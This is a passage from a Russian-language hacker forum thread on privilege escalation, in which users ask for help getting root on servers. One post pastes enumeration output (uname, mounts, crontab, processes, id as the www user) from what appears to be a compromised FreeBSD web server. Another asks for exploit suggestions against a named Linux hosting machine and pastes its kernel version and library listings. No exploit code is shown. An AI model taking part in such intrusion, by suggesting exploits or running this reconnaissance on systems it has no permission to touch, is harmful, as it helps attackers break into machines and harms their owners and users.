Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Исходящие зачастую разрешены на 25, 53, 80, 8080, 21
     
  2. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Code:
    $ uname -a
    FreeBSD сайт 7.4-RELEASE-p7 FreeBSD 7.4-RELEASE-p7 #3: Fri May  4 12:59:48 YEKT 2012   alex@ сайт:/usr/obj/usr/src/sys/сайт i386
    $ ls -la /boot
    total 3328
    drwxr-xr-x  12 root  wheel    1024 Aug  4  2013 .
    drwxr-xr-x  22 root  wheel     512 May 14  2012 ..
    drwxr-xr-x   2 root  wheel   28672 Feb 17  2011 GENERIC
    -r--r--r--   1 root  wheel    7689 May 14  2012 beastie.4th
    -r--r--r--   1 root  wheel    8192 May 14  2012 boot
    -r--r--r--   1 root  wheel     512 May 14  2012 boot0
    -r--r--r--   1 root  wheel     512 May 14  2012 boot0sio
    -r--r--r--   1 root  wheel     512 May 14  2012 boot1
    -r--r--r--   1 root  wheel    7680 May 14  2012 boot2
    -r--r--r--   1 root  wheel    1201 May 14  2012 cdboot
    drwxr-xr-x   2 root  wheel     512 May 14  2012 defaults
    -r--r--r--   1 root  wheel    1746 Feb 17  2011 device.hints
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 firmware
    -r--r--r--   1 root  wheel    2258 May 14  2012 frames.4th
    -r--r--r--   1 root  wheel    7567 May 14  2012 gptboot
    -r--r--r--   1 root  wheel   26259 May 14  2012 gptzfsboot
    drwxr-xr-x   2 root  wheel   12288 Aug  5  2013 kernel
    drwxr-xr-x   2 root  wheel   28672 Mar 30  2011 kernel.GENERIC
    drwxr-xr-x   2 root  wheel     512 Aug  3  2013 kernel.сайт
    drwxr-xr-x   2 root  wheel   12288 Aug  5  2013 kernel.modules
    drwxr-xr-x   2 root  wheel     512 May 14  2012 kernel.old
    -r-xr-xr-x   1 root  wheel  253952 May 14  2012 loader
    -r--r--r--   1 root  wheel    5865 May 14  2012 loader.4th
    -rw-r--r--   1 root  wheel      18 Mar 30  2011 loader.conf
    -rw-r--r--   1 root  wheel      17 Mar 30  2011 loader.conf.old
    -r--r--r--   1 root  wheel   15219 May 14  2012 loader.help
    -r-xr-xr-x   1 root  wheel  253952 Dec 30  2011 loader.old
    -r--r--r--   1 root  wheel     392 Feb 17  2011 loader.rc
    -r--r--r--   1 root  wheel     512 May 14  2012 mbr
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 modules
    -r--r--r--   1 root  wheel     512 May 14  2012 pmbr
    -r--r--r--   1 root  wheel  256000 May 14  2012 pxeboot
    -r--r--r--   1 root  wheel     699 May 14  2012 screen.4th
    -r--r--r--   1 root  wheel   35136 May 14  2012 support.4th
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 zfs
    -r--r--r--   1 root  wheel   33280 May 14  2012 zfsboot
    -r-xr-xr-x   1 root  wheel  274432 May 14  2012 zfsloader
    -r-xr-xr-x   1 root  wheel  274432 Dec 30  2011 zfsloader.old
    $ mount
    /dev/mfid0a on / (ufs, local, noatime, soft-updates)
    devfs on /dev (devfs, local)
    /dev/mfid0e on /usr/local (ufs, local, noatime, soft-updates)
    /dev/mfid0d on /usr (ufs, local, noatime, soft-updates)
    /dev/mfid0f on /var (ufs, local, noatime, soft-updates)
    /dev/mfid0g on /mail (ufs, local, noatime, soft-updates)
    /dev/mfid0h on /local (ufs, local, noatime, soft-updates)
    /dev/mfid1s1d on /opt (ufs, local, noatime)
    /dev/mfid1s1e on /backup (ufs, local, noatime)
    /dev/md0 on /local/www/сайт/cache (ufs, asynchronous, local, noexec, nosuid)
    $ df -h
    Filesystem       Size    Used   Avail Capacity  Mounted on
    /dev/mfid0a      1.9G    419M    1.4G    23%    /
    devfs            1.0K    1.0K      0B   100%    /dev
    /dev/mfid0e      4.8G    4.0K    4.5G     0%    /usr/local
    /dev/mfid0d      4.8G    4.4G     85M    98%    /usr
    /dev/mfid0f       48G     40G    4.8G    89%    /var
    /dev/mfid0g      194G    127G     51G    71%    /mail
    /dev/mfid0h      315G    225G     65G    78%    /local
    /dev/mfid1s1d    291G     28G    240G    10%    /opt
    /dev/mfid1s1e    286G    246G     17G    94%    /backup
    /dev/md0          31M    274K     28M     1%    /local/www/сайт/cache
    $ cat /etc/crontab
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute    hour    mday    month    wday    who    command
    #
    */5    *    *    *    *    root    /usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11    *    *    *    *    operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0    *    *    *    *    root    newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1    3    *    *    *    root    periodic daily
    15    4    *    *    6    root    periodic weekly
    30    5    1    *    *    root    periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31    0-5    *    *    *    root    adjkerntz –a
    $ ls -la /libexec
    total 736
    drwxr-xr-x   2 root  wheel     512 May 14  2012 .
    drwxr-xr-x  22 root  wheel     512 May 14  2012 ..
    -r-xr-xr-x   1 root  wheel  180896 Dec 30  2011 ld-elf.so.1
    -r-xr-xr-x   1 root  wheel  189184 Feb 17  2011 ld-elf.so.1.old
    $ ps axfu
    USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
    www  95411 42.9  1.2 54276 41460  ??  S     1:32PM   6:07.03 /usr/local/sbin/ht
    www   5177 25.5  2.2 100356 74032  ??  R     2:32PM   0:18.89 /usr/local/sbin/ht
    www  90963  8.9  1.2 54532 41976  ??  S     1:03PM   8:25.48 /usr/local/sbin/ht
    www  95403  8.4  1.2 54276 41800  ??  R     1:32PM   5:43.07 /usr/local/sbin/ht
    www  88613  8.3  1.2 54532 41816  ??  S    12:49PM  10:15.64 /usr/local/sbin/ht
    www   5696  7.9  0.1  3756  2668  ??  S     2:35PM   0:00.02 sendmail: ./t5H9Zj
    www   5695  7.8  0.0  3460  1144  ??  S     2:35PM   0:00.00 sh -c /usr/sbin/se
    www  94821  7.8  1.2 55300 41244  ??  S     1:28PM   6:21.93 /usr/local/sbin/ht
    www  96019  7.6  1.2 54276 41068  ??  S     1:36PM   5:11.63 /usr/local/sbin/ht
    www  95914  7.5  1.2 54276 41184  ??  S     1:35PM   5:31.22 /usr/local/sbin/ht
    www   5458  7.1  0.8 40964 26572  ??  S     2:34PM   0:07.37 /usr/local/sbin/ht
    www  95698  6.6  1.2 53252 40632  ??  S     1:34PM   5:23.52 /usr/local/sbin/ht
    www   5689  3.8  0.7 39940 22140  ??  S     2:35PM   0:00.56 /usr/local/sbin/ht
    www    914  3.6  0.2  8192  6688  ??  R    22May15 1399:37.78 nginx: worker proc
    www    913  2.9  0.2  9216  7344  ??  S    22May15 1401:01.32 nginx: worker proc
    www  95287  2.8  1.3 55300 42616  ??  R     1:31PM   6:12.23 /usr/local/sbin/ht
    www   5692  1.6  0.6 39940 20212  ??  S     2:35PM   0:00.23 /usr/local/sbin/ht
    www    932  0.0  0.3 36776 10456  ??  I    22May15   0:00.21 /usr/local/sbin/ht
    www   5702  0.0  0.0  3460  1144  ??  S     2:35PM   0:00.00 sh -c ps axfu
    www   5703  0.0  0.0  3244   944  ??  R     2:35PM   0:00.00 ps axfu
    www  20314  0.0  0.0     0     0  ??  Z    Mon09AM   0:00.00 <defunct>
    www  42814  0.0  0.0     0     0  ??  Z    Sun11PM   0:00.00 <defunct>
    www  50717  0.0  0.0  3460  1100  ??  I     8Jun15   0:00.01 /bin/sh -i
    www  52999  0.0  0.0  3128   700  ??  I     8Jun15   0:02.89 tail -f pureftpd.l
    www  58328  0.0  0.0     0     0  ??  Z    Sun12PM   0:00.05 <defunct>
    www  89316  0.0  0.0     0     0  ??  Z     3:28PM   0:00.00 <defunct>
    ls -la /tmp
    total 1280
    drwxrwxrwt  10 root         wheel   3072 Jun 17 14:39 .
    drwxr-xr-x  22 root         wheel    512 May 14  2012 ..
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .ICE-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .X11-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .XIM-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .font-unix
    -rw-------   1 spamassasin  wheel   7221 Nov 25  2013 .spamassassin12210SilOHtmp
    drwx------   3 www          www      512 Dec 19  2011 fast
    prw-------   1 root         wheel      0 Mar 30  2011 make_fifo_VRxkXE6sJ
    drwx------   2 alex         wheel    512 Nov 15  2012 mc-alex
    drwx------   2 root         wheel    512 Jun  2 11:22 mc-root
    -rw-r--r--   1 www          wheel      0 Jun  8 15:53 overwrites
    -rw-------   1 root         wheel     36 Jun 23  2011 periodic.slLwSSsz08
    -rw-------   1 root         wheel     48 Jun 23  2011 periodic.vODgX3C8Hg
    drwxr-xr-x   3 root         wheel    512 Apr  9  2011 screens
    -rw-------   1 root         wheel      0 Jun 23  2011 security.MxksURwR
    $ id
    uid=80(www) gid=80(www) groups=80(www)
    
     
  3. ErrNick

    ErrNick New Member

    Joined:
    17 Aug 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    подскажите что нить для этой машинки
    uname -a
    Code:
    Linux mh40.mobyhost.ru 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64 x86_64 x86_64 GNU/Linux
    ls -la --full-time /lib
    Code:
    total 17352
    drwxr-xr-x 11 root root    4096 2015-06-16 01:09:12.000000000 +0300 .
    drwxr-xr-x 28 root root    4096 2015-06-30 23:01:02.000000000 +0300 ..
    -rw-r--r--  1 root root      65 2015-05-13 13:33:41.000000000 +0300 .libcrypto.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      25 2015-05-14 01:08:56.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
    -rw-r--r--  1 root root      65 2015-05-13 13:33:41.000000000 +0300 .libssl.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      22 2015-05-14 01:08:56.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
    drwxr-xr-x  2 root root    4096 2014-10-01 01:12:30.000000000 +0400 bdevid
    lrwxrwxrwx  1 root root      14 2014-10-01 01:11:14.000000000 +0400 cpp -> ../usr/bin/cpp
    drwxr-xr-x  2 root root    4096 2014-10-01 01:11:27.000000000 +0400 firmware
    drwxr-xr-x  3 root root    4096 2015-01-27 21:28:03.000000000 +0300 i686
    drwxr-xr-x  6 root root    4096 2013-01-09 07:14:22.000000000 +0400 kbd
    -rwxr-xr-x  1 root root  130860 2015-01-27 22:04:53.000000000 +0300 ld-2.5.so
    lrwxrwxrwx  1 root root       9 2015-01-28 18:11:41.000000000 +0300 ld-linux.so.2 -> ld-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:50.000000000 +0300 ld-lsb.so.3 -> ld-linux.so.2
    -rwxr-xr-x  1 root root    7664 2015-01-27 22:04:53.000000000 +0300 libBrokenLocale-2.5.so
    lrwxrwxrwx  1 root root      22 2015-01-28 18:11:41.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x  1 root root   16704 2015-01-27 22:04:53.000000000 +0300 libSegFault.so
    -rwxr-xr-x  1 root root   14128 2015-01-27 22:04:53.000000000 +0300 libanl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:41.000000000 +0300 libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx  1 root root      18 2010-02-26 16:19:28.000000000 +0300 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  907328 2009-01-21 06:47:23.000000000 +0300 libasound.so.2.0.0
    lrwxrwxrwx  1 root root      17 2012-03-13 01:13:26.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root   95740 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      19 2012-03-13 01:13:26.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root   58932 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root      15 2014-10-01 01:12:22.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x  1 root root   36740 2014-09-18 14:12:28.000000000 +0400 libblkid.so.1.0
    -rwxr-xr-x  1 root root 1706208 2015-01-27 22:04:54.000000000 +0300 libc-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:42.000000000 +0300 libc.so.6 -> libc-2.5.so
    lrwxrwxrwx  1 root root      14 2009-09-29 10:32:08.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x  1 root root   11560 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
    -rwxr-xr-x  1 root root  191708 2015-01-27 22:04:55.000000000 +0300 libcidn-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:42.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx  1 root root      17 2014-10-01 01:12:22.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root    6364 2014-09-18 14:12:28.000000000 +0400 libcom_err.so.2.1
    -rwxr-xr-x  1 root root   45432 2015-01-27 22:04:55.000000000 +0300 libcrypt-2.5.so
    lrwxrwxrwx  1 root root      15 2015-01-28 18:11:42.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x  1 root root 1299328 2015-05-13 13:33:41.000000000 +0300 libcrypto.so.0.9.8e
    lrwxrwxrwx  1 root root      14 2009-09-29 10:32:08.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
    lrwxrwxrwx  1 root root      19 2015-05-14 01:08:56.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x  1 root root  838860 2007-01-07 08:37:48.000000000 +0300 libdb-4.1.so
    -rwxr-xr-x  1 root root  934132 2007-01-07 08:37:48.000000000 +0300 libdb-4.2.so
    -rwxr-xr-x  1 root root 1010204 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
    -rwxr-xr-x  1 root root  905704 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.1.so
    -rwxr-xr-x  1 root root 1019472 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.2.so
    lrwxrwxrwx  1 root root      18 2013-10-20 01:11:03.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  257492 2013-10-02 01:59:51.000000000 +0400 libdbus-1.so.3.4.0
    -r--r--r--  1 root root   45098 2014-11-18 13:11:21.000000000 +0300 libdevmapper-event.a
    lrwxrwxrwx  1 root root      26 2014-11-19 01:08:51.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x  1 root root   18488 2014-11-18 13:11:29.000000000 +0300 libdevmapper-event.so.1.02
    -r--r--r--  1 root root  496324 2014-11-18 13:11:15.000000000 +0300 libdevmapper.a
    lrwxrwxrwx  1 root root      20 2014-11-19 01:08:51.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x  1 root root  163292 2014-11-18 13:11:29.000000000 +0300 libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   20668 2015-01-27 22:04:55.000000000 +0300 libdl-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:42.000000000 +0300 libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx  1 root root      13 2014-10-01 01:12:22.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   20192 2014-09-18 14:12:28.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      17 2012-06-14 01:12:14.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x  1 root root  135932 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
    lrwxrwxrwx  1 root root      16 2014-10-01 01:12:22.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  113892 2014-09-18 14:12:28.000000000 +0400 libext2fs.so.2.4
    -rwxr-xr-x  1 root root   45192 2014-09-18 07:05:57.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      28 2014-10-01 01:12:23.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      23 2009-09-29 10:32:11.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  644472 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:08.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   11396 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:08.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  259128 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:11.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   14660 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   27964 2007-03-15 06:26:22.000000000 +0300 libiw.so.28
    -rwxr-xr-x  1 root root    6404 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2009-09-29 10:32:08.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x  1 root root  216544 2015-01-27 22:04:55.000000000 +0300 libm-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:42.000000000 +0300 libm.so.6 -> libm-2.5.so
    -rwxr-xr-x  1 root root  109740 2015-01-27 22:04:55.000000000 +0300 libnsl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:42.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x  1 root root   36468 2015-01-27 22:04:55.000000000 +0300 libnss_compat-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:42.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x  1 root root  827876 2015-01-05 13:12:47.000000000 +0300 libnss_db-2.2.so
    lrwxrwxrwx  1 root root      16 2015-01-06 01:08:48.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x  1 root root   21948 2015-01-27 22:04:56.000000000 +0300 libnss_dns-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x  1 root root   50848 2015-01-27 22:04:56.000000000 +0300 libnss_files-2.5.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:42.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x  1 root root   22764 2015-01-27 22:04:56.000000000 +0300 libnss_hesiod-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:42.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x  1 root root 3217504 2015-06-15 15:37:43.000000000 +0300 libnss_ldap-2.5.so
    lrwxrwxrwx  1 root root      18 2015-06-16 01:09:12.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x  1 root root   46624 2015-01-27 22:04:56.000000000 +0300 libnss_nis-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x  1 root root   55804 2015-01-27 22:04:56.000000000 +0300 libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      21 2015-01-28 18:11:42.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      16 2015-05-28 01:09:09.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x  1 root root   43020 2015-05-27 16:48:30.000000000 +0300 libpam.so.0.81.5
    lrwxrwxrwx  1 root root      21 2015-05-28 01:09:09.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x  1 root root    8624 2015-05-27 16:48:30.000000000 +0300 libpam_misc.so.0.81.2
    lrwxrwxrwx  1 root root      17 2015-05-28 01:09:09.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x  1 root root    9868 2015-05-27 16:48:30.000000000 +0300 libpamc.so.0.81.0
    lrwxrwxrwx  1 root root      16 2013-10-20 01:10:29.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  127760 2013-10-01 22:18:22.000000000 +0400 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  137944 2015-01-27 22:04:56.000000000 +0300 libpthread-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x  1 root root   84904 2015-01-27 22:04:56.000000000 +0300 libresolv-2.5.so
    lrwxrwxrwx  1 root root      16 2015-01-28 18:11:42.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x  1 root root   48156 2015-01-27 22:04:56.000000000 +0300 librt-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:42.000000000 +0300 librt.so.1 -> librt-2.5.so
    -rwxr-xr-x  1 root root   91892 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
    -rwxr-xr-x  1 root root  243928 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      12 2014-10-01 01:12:22.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   19008 2014-09-18 14:12:28.000000000 +0400 libss.so.2.0
    -rwxr-xr-x  1 root root  300636 2015-05-13 13:33:41.000000000 +0300 libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      11 2009-09-29 10:32:08.000000000 +0400 libssl.so.4 -> libssl.so.6
    lrwxrwxrwx  1 root root      16 2015-05-14 01:08:56.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      19 2009-09-29 10:32:12.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   11636 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   33852 2015-01-27 22:04:56.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:42.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root   13492 2015-01-27 22:04:56.000000000 +0300 libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:42.000000000 +0300 libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2014-10-01 01:12:22.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x  1 root root   14472 2014-09-18 14:12:28.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      22 2014-10-01 01:12:29.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x  1 root root   37032 2014-09-17 23:19:08.000000000 +0400 libvolume_id.so.0.66.0
    lrwxrwxrwx  1 root root      16 2009-10-23 01:10:46.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root   31344 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:38.000000000 +0400 libz.so -> libz.so.1.2.3
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:13.000000000 +0400 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   75088 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2011-04-10 01:15:39.000000000 +0400 lsb
    drwxr-xr-x 12 root root    4096 2014-12-25 01:09:56.000000000 +0300 modules
    drwxr-xr-x  3 root root    4096 2015-01-28 18:11:42.000000000 +0300 rtkaio
    drwxr-xr-x  4 root root    4096 2015-06-16 01:09:12.000000000 +0300 security
    drwxr-xr-x  3 root root    4096 2015-07-01 04:23:58.000000000 +0300 udev
    ls -la --full-time /lib64
    Code:
    total 25552
    drwxr-xr-x  8 root root    4096 2015-07-01 04:24:40.000000000 +0300 .
    drwxr-xr-x 28 root root    4096 2015-06-30 23:01:02.000000000 +0300 ..
    -rw-r--r--  1 root root      65 2015-05-12 23:58:28.000000000 +0300 .libcrypto.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      25 2015-05-14 01:08:43.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
    -rw-r--r--  1 root root      65 2015-05-12 23:58:28.000000000 +0300 .libssl.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      22 2015-05-14 01:08:43.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
    drwxr-xr-x  2 root root    4096 2014-10-01 01:11:16.000000000 +0400 bdevid
    drwxr-xr-x  2 root root    4096 2015-01-29 04:17:01.000000000 +0300 dbus-1
    drwxr-xr-x  2 root root    4096 2014-10-01 01:10:52.000000000 +0400 device-mapper
    drwxr-xr-x  2 root root    4096 2012-10-31 01:09:48.000000000 +0400 iptables
    -rwxr-xr-x  1 root root  144776 2015-01-27 20:33:48.000000000 +0300 ld-2.5.so
    lrwxrwxrwx  1 root root       9 2015-01-28 18:11:22.000000000 +0300 ld-linux-x86-64.so.2 -> ld-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:50.000000000 +0300 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2
    lrwxrwxrwx  1 root root      20 2011-04-10 01:15:38.000000000 +0400 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2
    -rwxr-xr-x  1 root root    8904 2015-01-27 20:33:48.000000000 +0300 libBrokenLocale-2.5.so
    lrwxrwxrwx  1 root root      22 2015-01-28 18:11:22.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x  1 root root   22336 2015-01-27 20:33:48.000000000 +0300 libSegFault.so
    lrwxrwxrwx  1 root root      15 2012-03-13 01:11:51.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x  1 root root   27920 2012-02-22 17:57:53.000000000 +0400 libacl.so.1.1.0
    -rwxr-xr-x  1 root root   20064 2015-01-27 20:33:48.000000000 +0300 libanl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:22.000000000 +0300 libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx  1 root root      18 2009-10-06 15:17:14.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  907552 2009-01-21 06:42:23.000000000 +0300 libasound.so.2.0.0
    lrwxrwxrwx  1 root root      16 2009-09-29 10:33:40.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x  1 root root   17888 2007-01-06 08:09:58.000000000 +0300 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      17 2012-03-13 01:11:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root   98920 2012-02-22 19:10:07.000000000 +0400 libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      19 2012-03-13 01:11:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root   62200 2012-02-22 19:10:07.000000000 +0400 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root      15 2014-10-01 01:10:44.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x  1 root root   43840 2014-09-18 14:12:06.000000000 +0400 libblkid.so.1.0
    -rwxr-xr-x  1 root root 1726296 2015-01-27 20:33:48.000000000 +0300 libc-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:22.000000000 +0300 libc.so.6 -> libc-2.5.so
    lrwxrwxrwx  1 root root      14 2009-09-29 10:33:39.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x  1 root root   17384 2007-03-14 21:13:01.000000000 +0300 libcap.so.1.10
    -rwxr-xr-x  1 root root  197744 2015-01-27 20:33:48.000000000 +0300 libcidn-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:22.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx  1 root root      17 2014-10-01 01:10:44.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root   10096 2014-09-18 14:12:06.000000000 +0400 libcom_err.so.2.1
